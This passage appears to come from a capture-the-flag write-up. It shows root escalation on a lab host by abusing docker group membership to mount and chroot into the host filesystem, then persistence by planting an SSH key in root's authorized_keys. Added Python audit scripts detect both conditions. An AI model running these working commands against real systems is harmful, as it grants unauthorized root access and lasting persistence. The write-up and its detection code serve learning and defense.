Docker Group


Membership in the docker group is equivalent to root on the host: the Docker daemon runs as root, and any group member can ask it to mount the host filesystem into a container.

r00t@ultratech-prod:/home$ docker run -v /:/mnt --rm -it 495d6437fc1e chroot /mnt sh
# 

This command bind-mounts the host's root filesystem at /mnt inside a throwaway container (-v /:/mnt, --rm) and chroots into it, so the shell that follows runs as root on the host's real filesystem; nothing is actually copied.

# whoami
root
# hostnam
# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.2  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:ac:11:00:02  txqueuelen 0  (Ethernet)
        RX packets 11  bytes 906 (906.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

I’m inside the newly created Docker container

# ls -lasht
total 40K
4.0K -rw-------  1 root root  844 Mar 22  2019 .bash_history
4.0K drwx------  6 root root 4.0K Mar 22  2019 .
4.0K -rw-rw-rw-  1 root root  193 Mar 22  2019 private.txt
4.0K drwx------  3 root root 4.0K Mar 22  2019 .emacs.d
4.0K drwx------  3 root root 4.0K Mar 22  2019 .gnupg
4.0K drwx------  2 root root 4.0K Mar 22  2019 .cache
4.0K drwx------  2 root root 4.0K Mar 22  2019 .ssh
   0 -rw-------  1 root root    0 Mar 22  2019 .python_history
4.0K drwxr-xr-x 23 root root 4.0K Mar 19  2019 ..
4.0K -rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
4.0K -rw-r--r--  1 root root  148 Aug 17  2015 .profile

Listing of root's home directory on the host, reached through the chroot
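The two conditions the writeup relies on, a user in the docker group and a container that bind-mounts the host's root, are both visible from the host. The following audit script is an added example, not part of the original writeup: it parses a constructed /etc/group sample and a constructed, trimmed docker inspect JSON sample (shaped like the real command's output) and reports docker group members and containers whose bind mounts reach sensitive host paths or that run privileged. The container names and the list of sensitive paths are assumptions.

```python
"""Audit helpers for the docker-group-equals-root condition.

Added example, not part of the original writeup. Input samples are
constructed; the container names and sensitive-path list are assumptions.
"""
import json

# Host paths that, when bind-mounted into a container, hand the container
# the host's identity, credentials or the Docker daemon itself.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/home", "/var/run/docker.sock")


def docker_group_members(group_text: str) -> list[str]:
    """Return the users listed as members of 'docker' in /etc/group-format text."""
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == "docker":
            return [u for u in fields[3].split(",") if u]
    return []


def _covers_sensitive_path(source: str) -> bool:
    """True if the mount source is, contains, or sits under a sensitive host path."""
    source = source.rstrip("/") or "/"
    if source == "/":
        return True
    for p in SENSITIVE_HOST_PATHS:
        if source == p or p.startswith(source + "/") or source.startswith(p + "/"):
            return True
    return False


def risky_containers(inspect_json: str) -> dict[str, list[str]]:
    """Map container name -> findings, from `docker inspect <containers>` JSON."""
    findings: dict[str, list[str]] = {}
    for c in json.loads(inspect_json):
        name = c.get("Name", "?").lstrip("/")
        reasons = []
        if c.get("HostConfig", {}).get("Privileged"):
            reasons.append("privileged")
        for m in c.get("Mounts", []):
            src = m.get("Source", "")
            if m.get("Type") == "bind" and _covers_sensitive_path(src):
                mode = "rw" if m.get("RW", True) else "ro"
                reasons.append(f"bind {src} -> {m.get('Destination')} ({mode})")
        if reasons:
            findings[name] = reasons
    return findings


# Constructed /etc/group sample: r00t is in the docker group, as on the host above.
SAMPLE_GROUP = """root:x:0:
docker:x:999:r00t
sudo:x:27:
"""

# Constructed, trimmed `docker inspect` output using the real field names
# (Name, HostConfig.Privileged, Mounts[].Type/Source/Destination/RW).
SAMPLE_INSPECT = json.dumps([
    {"Name": "/escape", "HostConfig": {"Privileged": False},
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt", "RW": True}]},
    {"Name": "/web", "HostConfig": {"Privileged": False},
     "Mounts": [{"Type": "bind", "Source": "/srv/www",
                 "Destination": "/usr/share/nginx/html", "RW": False}]},
    {"Name": "/agent", "HostConfig": {"Privileged": True}, "Mounts": []},
])

if __name__ == "__main__":
    for user in docker_group_members(SAMPLE_GROUP):
        print(f"docker group member (root-equivalent): {user}")
    for name, reasons in risky_containers(SAMPLE_INSPECT).items():
        print(f"{name}: {'; '.join(reasons)}")
```

On a live host the same functions can be fed the output of getent group docker and docker inspect $(docker ps -q). Reviewing docker group membership is the primary control here; the container findings are the after-the-fact signal that someone has already used it.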

SSH Key Write


# echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali' >> /root/.ssh/authorized_keys

Appending the attacker-controlled public key to the host's /root/.ssh/authorized_keys through the chroot, which is what makes the direct root SSH login below possible

┌──(kali㉿kali)-[~/archive/thm/ultratech]
└─$ ssh root@$IP -i ~/.ssh/id_ed25519
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-46-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
  System information as of Mon Jul 22 17:49:21 UTC 2024
 
  System load:  0.0                Processes:              113
  Usage of /:   24.4% of 19.56GB   Users logged in:        1
  Memory usage: 54%                IP address for eth0:    10.10.57.71
  Swap usage:   0%                 IP address for docker0: 172.17.0.1
 
 
1 package can be updated.
0 updates are security updates.
 
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
 
Last login: Fri Mar 22 18:19:40 2019
root@ultratech-prod:~# whoami
root
root@ultratech-prod:~# hostname
ultratech-prod
root@ultratech-prod:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc fq_codel state UP group default qlen 1000
    link/ether 02:1c:21:b7:f9:bf brd ff:ff:ff:ff:ff:ff
    inet 10.10.57.71/16 brd 10.10.255.255 scope global dynamic eth0
       valid_lft 3006sec preferred_lft 3006sec
    inet6 fe80::1c:21ff:feb7:f9bf/64 scope link 
       valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:92:e3:60:06 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:92ff:fee3:6006/64 scope link 
       valid_lft forever preferred_lft forever
7: veth4442501@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether 8e:b9:2d:56:5c:7c brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::8cb9:2dff:fe56:5c7c/64 scope link 
       valid_lft forever preferred_lft forever

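The persistence step above leaves a durable artefact: a new line in root's authorized_keys. The script below is an added example, not part of the original writeup; it parses authorized_keys lines, checks that the key type embedded in the base64 blob matches the declared type, computes the OpenSSH-style SHA256 fingerprint, and flags any entry whose fingerprint is not on an approved baseline. The sample file is constructed: the approved entry is a synthetic, unusable ssh-ed25519 blob built in the code, and the flagged entry is the key line from the writeup.

```python
"""Flag authorized_keys entries outside an approved fingerprint baseline.

Added example, not part of the original writeup. The approved key is a
synthetic blob built here (not a real key); the sample file is constructed.
"""
import base64
import hashlib
import struct

KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-sha2-", "sk-")


def _ssh_string(data: bytes) -> bytes:
    """SSH wire-format string: 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def blob_key_type(blob: bytes) -> str:
    """Key type embedded at the start of a public key blob (e.g. 'ssh-ed25519')."""
    if len(blob) < 4:
        raise ValueError("blob too short")
    (n,) = struct.unpack(">I", blob[:4])
    if len(blob) < 4 + n:
        raise ValueError("truncated key type")
    return blob[4:4 + n].decode("ascii")


def fingerprint(blob: bytes) -> str:
    """SHA256 fingerprint in the form ssh-keygen -l prints (unpadded base64)."""
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")


def parse_authorized_keys(text: str) -> list[dict]:
    """Parse authorized_keys lines; malformed lines are reported, not silently skipped."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        # Options (command=..., from=...) may precede the key type; find the type token.
        idx = next((i for i, t in enumerate(tokens) if t.startswith(KEY_TYPE_PREFIXES)), None)
        if idx is None or idx + 1 >= len(tokens):
            entries.append({"line": lineno, "error": "no key type / key material"})
            continue
        declared, b64 = tokens[idx], tokens[idx + 1]
        comment = " ".join(tokens[idx + 2:])
        try:
            blob = base64.b64decode(b64, validate=True)
            embedded = blob_key_type(blob)
        except (ValueError, UnicodeDecodeError) as exc:  # binascii.Error is a ValueError
            entries.append({"line": lineno, "error": f"bad key blob: {exc}"})
            continue
        entries.append({"line": lineno, "type": declared, "comment": comment,
                        "fingerprint": fingerprint(blob),
                        "type_matches": embedded == declared})
    return entries


def unexpected_keys(text: str, approved: set[str]) -> list[dict]:
    """Entries that are malformed, internally inconsistent, or not on the baseline."""
    return [e for e in parse_authorized_keys(text)
            if "error" in e or not e["type_matches"] or e["fingerprint"] not in approved]


# Synthetic approved key: well-formed ssh-ed25519 blob with a constant 32-byte
# payload (constructed for the example; not a usable key).
APPROVED_BLOB = _ssh_string(b"ssh-ed25519") + _ssh_string(bytes(range(32)))
APPROVED_LINE = "ssh-ed25519 " + base64.b64encode(APPROVED_BLOB).decode() + " ops@bastion"
APPROVED = {fingerprint(APPROVED_BLOB)}

# Constructed authorized_keys content: the approved key, then the line the writeup appended.
SAMPLE_AUTHORIZED_KEYS = APPROVED_LINE + "\n" + (
    "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali\n"
)

if __name__ == "__main__":
    for e in unexpected_keys(SAMPLE_AUTHORIZED_KEYS, APPROVED):
        print("UNEXPECTED:", e)
```

Run it periodically against /root/.ssh/authorized_keys (and every other user's) with a baseline of fingerprints taken from ssh-keygen -lf on the approved public keys; a new fingerprint, a malformed line, or a blob whose embedded type disagrees with the declared type is worth an alert. File-integrity monitoring on the same path catches the write itself, since in the chroot shown above the append happens on the host filesystem directly.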
System Level Compromise